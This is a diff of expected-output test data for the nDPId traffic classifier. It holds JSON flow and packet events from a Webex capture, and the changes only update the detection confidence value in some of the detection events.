00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":461,"source":"webex.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1444570640269,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640269,"pkt":"ABoRAAACABoRAAABCABFAAA8fMBAAEAGd0oKCAABch3Ki7gfAbudV783AAAAAKACOQjtmQAAAgQFtAQCCAoATMP3AAAAAAEDAwY="} 
@@ -166,7 +166,7 @@ 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":474,"source":"webex.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1444570640344,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570640344,"pkt":"ABoRAAACABoRAAABCABFAAAoAflAABAGP+k+beB4CggAAQG7x78XaeJ06JYdjFAS\/\/+9aAAA"} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":484,"source":"webex.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570640346,"flow_last_seen":1444570640346,"flow_idle_time":7580000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":1,"thread_ts_msec":1444570640346,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"80.74.110.68","src_port":33459,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":484,"source":"webex.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1444570640346,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1444570640346,"pkt":"ABoRAAACABoRAAABCABFAABLP\/ZAAEAGY3QKhc4vUEpuRIKzAbsvtI0Fj3ahWYAYAWE\/AgAAAQEICgBMxFRXHeViFQMBABJ8gv9dmaTjHFUtA85jnlaY0C8="} 
-00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":484,"source":"webex.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570640346,"flow_last_seen":1444570640346,"flow_idle_time":7580000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":1,"thread_ts_msec":1444570640346,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"80.74.110.68","src_port":33459,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":484,"source":"webex.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570640346,"flow_last_seen":1444570640346,"flow_idle_time":7580000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":1,"thread_ts_msec":1444570640346,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"80.74.110.68","src_port":33459,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":485,"source":"webex.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1444570640347,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1444570640347,"pkt":"ABoRAAACABoRAAABCABFAAA0P\/dAAEAGY4oKhc4vUEpuRIKzAbsvtI0cj3ahWYARAWFq6AAAAQEICgBMxFRXHeVi"} 
00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":486,"source":"webex.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1444570640347,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570640347,"pkt":"ABoRAAACABoRAAABCABFAAAoAfpAABAG0ZNQSm5ECoXOLwG7grOPdqFZL7SNHVAQ\/\/+mgQAA"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"webex.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1444570640348,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640348,"pkt":"ABoRAAACABoRAAABCABFAAA8fMFAAEAGd0kKCAABch3Ki7gfAbudV783AAAAAKACOQjtNQAAAgQFtAQCCAoATMRbAAAAAAEDAwY="} 
@@ -182,19 +182,19 @@ 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":500,"source":"webex.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1444570640389,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640389,"pkt":"ABoRAAACABoRAAABCABFAAA8c3ZAAEAGE5IKCAABQERpZ6GyAbtpybCOAAAAAKACOQjY0wAAAgQFtAQCCAoATMRfAAAAAAEDAwY="} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":502,"source":"webex.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1444570640395,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640395,"pkt":"ABoRAAACABoRAAABCABFAAA8tGlAAEAGXWQKCAABPm3geMe+AbssX3BwAAAAAKACOQi6+AAAAgQFtAQCCAoATMR8AAAAAAEDAwY="} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":504,"source":"webex.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1444570640399,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640399,"pkt":"ABoRAAACABoRAAABCABFAAA82ZRAAEAGODkKCAABPm3geMe\/Abvolh2LAAAAAKACOQhRpAAAAgQFtAQCCAoATMR9AAAAAAEDAwY="} 
-00933{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":509,"source":"webex.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640269,"flow_last_seen":1444570640404,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1444570640404,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47135,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00933{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"webex.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640284,"flow_last_seen":1444570640404,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1444570640404,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.213.212","src_port":41757,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":515,"source":"webex.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640298,"flow_last_seen":1444570640404,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1444570640404,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51676,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":518,"source":"webex.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640310,"flow_last_seen":1444570640405,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1444570640405,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.98","src_port":37139,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":521,"source":"webex.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640319,"flow_last_seen":1444570640406,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1444570640406,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41394,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00933{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":524,"source":"webex.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640330,"flow_last_seen":1444570640406,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1444570640406,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51134,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-00933{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":527,"source":"webex.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640338,"flow_last_seen":1444570640407,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1444570640407,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51135,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00933{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":509,"source":"webex.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640269,"flow_last_seen":1444570640404,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1444570640404,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47135,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00933{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"webex.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640284,"flow_last_seen":1444570640404,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1444570640404,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.213.212","src_port":41757,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":515,"source":"webex.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640298,"flow_last_seen":1444570640404,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1444570640404,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51676,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":518,"source":"webex.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640310,"flow_last_seen":1444570640405,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1444570640405,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.98","src_port":37139,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":521,"source":"webex.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640319,"flow_last_seen":1444570640406,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1444570640406,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41394,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00933{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":524,"source":"webex.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640330,"flow_last_seen":1444570640406,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1444570640406,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51134,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00933{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":527,"source":"webex.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640338,"flow_last_seen":1444570640407,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1444570640407,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51135,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":534,"source":"webex.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1444570640407,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570640407,"pkt":"ABoRAAACABoRAAABCABFAAAoO9lAAEAGNmAKCAABUEpuRILnAbv7u\/+EBEQAfVAQOQgpkQAA"} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":535,"source":"webex.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1444570640408,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570640408,"pkt":"ABoRAAACABoRAAABCABFAAAosmNAAEAGv9UKCAABUEpuRILoAbtZhnZApnmJwVAQOQgpkAAA"} -00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":536,"source":"webex.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570640382,"flow_last_seen":1444570640408,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570640408,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33511,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":538,"source":"webex.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570640385,"flow_last_seen":1444570640408,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570640408,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33512,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01472{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":543,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570638225,"flow_last_seen":1444570640491,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3697,"flow_tot_l4_payload_len":3924,"flow_avg_l4_payload_len":654,"midstream":0,"thread_ts_msec":1444570640491,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"216.58.208.40","src_port":43433,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"ssl.google-analytics.com","server_names":"*.google-analytics.com,app-measurement.com,google-analytics.com,googletagmanager.com,service.urchin.com,ssl.google-analytics.com,urchin.com,www.google-analytics.com,www.googletagmanager.com","ja3":"75edb912bc6f0a222ae3e3e47f5c89b1","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.google-analytics.com","fingerprint":"E0:F0:1E:71:F2:B5:D9:2D:F7:4E:8F:CB:10:37:17:7C:0C:C4:07:9D"}} -00961{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":547,"source":"webex.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570640385,"flow_last_seen":1444570640593,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1444570640593,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33512,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6dfe5eb347aa509fc445e5628d467a2b","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} 
+00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":536,"source":"webex.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570640382,"flow_last_seen":1444570640408,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570640408,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33511,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":538,"source":"webex.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570640385,"flow_last_seen":1444570640408,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570640408,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33512,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
